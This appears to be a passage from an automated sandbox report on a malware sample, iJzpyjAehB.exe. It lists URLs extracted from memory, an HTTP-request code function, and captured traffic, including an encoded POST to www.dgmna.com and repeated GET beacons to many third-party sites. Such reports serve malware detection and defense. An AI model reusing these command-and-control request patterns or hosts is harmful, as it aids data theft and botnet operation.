                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/wp/v2/pages/1009
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/xmlrpc.php?rsd
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296716341.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.000000000760A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/$
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.000000000760A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/D
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.408241574.0000000009000000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.266699376.0000000004180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267371516.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/8
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297313999.0000000009100000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347295322.000000000759F000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297579920.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajum.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/e1ZfpowjQRo
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://wwwtest.com-sit.com/datenschutz/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 2b 71 62 62 4d 6b 66 59 39 2f 72 38 7a 4f 46 4b 64 6a 67 67 32 68 42 32 4c 37 63 39 39 72 2f 48 61 30 41 52 4c 68 69 6d 72 46 72 55 53 4d 69 70 49 51 44 35 46 43 7a 4d 2b 73 62 7a 64 67 65 38 49 57 6c 78 31 59 73 54 75 4c 31 48 39 42 4d 65 41 65 50 73 78 4f 6d 68 55 41 5a 65 6f 37 62 4a 37 55 61 37 56 66 6b 65 66 33 52 75 76 7a 4b 4a 39 77 59 39 39 58 73 6f 61 6e 74 41 4f 44 75 6b 77 67 52 37 42 4f 76 46 4a 68 62 51 46 6f 6f 69 48 41 67 37 75 2f 62 48 6c 45 45 43 6b 46 77 67 6c 68 77 43 33 4c 4d 36 69 6b 2b 49 54 4d 4f 4e 74 4c 73 6c 6f 36 32 6b 39 70 32 66 32 70 70 4a 56 48 64 7a 67 51 4a 6c 77 72 2b 58 31 6f 50 48 71 53 49 4c 44 72 76 33 51 57 57 6e 61 7a 50 49 67 43 35 67 78 42 59 51 7a 30 39 71 54 37 6f 46 54 66 49 56 31 6c 57 6d 56 6e 32 48 68 71 74 5a 59 73 78 55 65 6b 41 35 61 75 6b 37 37 51 75 58 75 49 36 2b 63 71 44 4e 62 74 33 44 73 37 2f 79 53 36 6b 2b 4e 6a 50 4d 53 39 33 51 79 47 47 69 57 79 70 51 53 43 33 39 6b 78 32 37 58 41 45 52 59 6f 42 59 76 2b 54 76 65 33 4f 62 48 76 2b 38 70 6c 56 32 7a 7a 4a 48 47 43 39 4a 34 78 69 50 6c 61 74 6f 53 50 4f 37 31 69 2b 30 45 53 4d 55 57 6c 52 6c 38 31 4e 64 63 4a 6f 38 5a 52 58 4b 63 37 49 37 6d 36 58 62 75 79 56 59 56 64 67 7a 6c 48 66 75 50 6c 69 59 43 50 6e 52 54 6e 45 74 33 70 51 54 56 54 66 34 50 44 37 72 32 2f 33 33 48 4c 35 43 39 34 76 68 68 76 2f 67 6a 6d 76 79 45 33 72 41 50 61 39 39 52 61 51 79 6d 36 4d 64 4f 4c 50 59 43 56 61 6e 74 73 4d 63 34 6c 65 77 4f 50 70 6f 4f 65 68 55 51 41 71 53 32 2f 36 30 50 78 78 38 55 48 4d 56 4d 6c 73 31 48 4e 7a 41 33 62 68 4a 77 39 6f 7a 4d 71 4f 43 6c 35 36 70 75 6a 68 38 76 57 53 67 54 55 34 30 61 68 45 33 41 6a 41 2f 75 6f 2b 78 37 48 30 36 74 76 64 68 62 47 32 49 59 6e 4d 3d Data Ascii: +qbbMkfY9/r8zOFKdjgg2hB2L7c99r/Ha0ARLhimrFrUSMipIQD5FCzM+sbzdge8IWlx1YsTuL1H9BMeAePsxOmhUAZeo7bJ7Ua7Vfkef3RuvzKJ9wY99XsoantAODukwgR7BOvFJhbQFooiHAg7u/bHlEECkFwglhwC3LM6ik+ITMONtLslo62k9p2f2ppJVHdzgQJlwr+X1oPHqSILDrv3QWWnazPIgC5gxBYQz09qT7oFTfIV1lWmVn2HhqtZYsxUekA5auk77QuXuI6+cqDNbt3Ds7/yS6k+NjPMS93QyGGiWypQSC39kx27XAERYoBYv+Tve3ObHv+8plV2zzJHGC9J4xiPlatoSPO71i+0ESMUWlRl81NdcJo8ZRXKc7I7m6XbuyVYVdgzlHfuPliYCPnRTnEt3pQTVTf4PD7r2/33HL5C94vhhv/gjmvyE3rAPa99RaQym6MdOLPYCVantsMc4lewOPpoOehUQAqS2/60Pxx8UHMVMls1HNzA3bhJw9ozMqOCl56pujh8vWSgTU40ahE3AjA/uo+x7H06tvdhbG2IYnM=
                      Source: unknownDNS traffic detected: queries for: www.baijaku.com
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04001840 InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,wnsprintfA,HttpAddRequestHeadersA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,HttpQueryInfoA,VirtualAlloc,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_04001840
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.deContent-Length: 3856
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.deContent-Length: 4428
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
